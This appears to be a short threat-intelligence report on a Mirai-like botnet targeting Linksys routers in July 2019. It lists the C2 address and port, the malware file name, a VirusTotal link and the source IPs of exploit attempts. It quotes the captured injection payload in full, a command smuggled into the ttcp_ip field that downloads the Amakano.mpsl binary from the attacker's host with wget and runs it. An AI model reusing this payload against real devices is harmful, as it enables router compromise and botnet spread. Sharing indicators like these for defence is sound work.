- Active Mirai-like botnet C2 detected:
- 192.236.162.197 (Hostwinds 🇺🇸)
- C2 port:
- 4426/tcp
- Exploit attempts targeting:
- Linksys routers
- Payload:
- "ttcp_ip=-h `cd /tmp; rm -rf Amakano.mpsl; wget http://192.236.162.197/vb/Amakano.mpsl; chmod 777 Amakano.mpsl; ./Amakano.mpsl linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commi"
- Malware binary:
- Amakano.mpsl
- https://www.virustotal.com/gui/file/7c2360a97f911aeef103e18414ad5e4f60153d28fc1735631445a0392a75c005/detection
- http://192.236.162.197/vb/ (open directory)
- Exploit attempt source IPs:
- Source IP Country FirstSeen
- 101.108.14.144 Thailand 2019-07-16T05:13:47Z
- 49.117.81.101 China 2019-07-16T03:33:34Z
- 109.116.203.139 Italy 2019-07-16T02:57:07Z
- 151.70.138.75 Italy 2019-07-16T02:05:19Z
- 2.45.252.16 Italy 2019-07-15T23:56:21Z
- 114.235.35.12 China 2019-07-15T23:43:14Z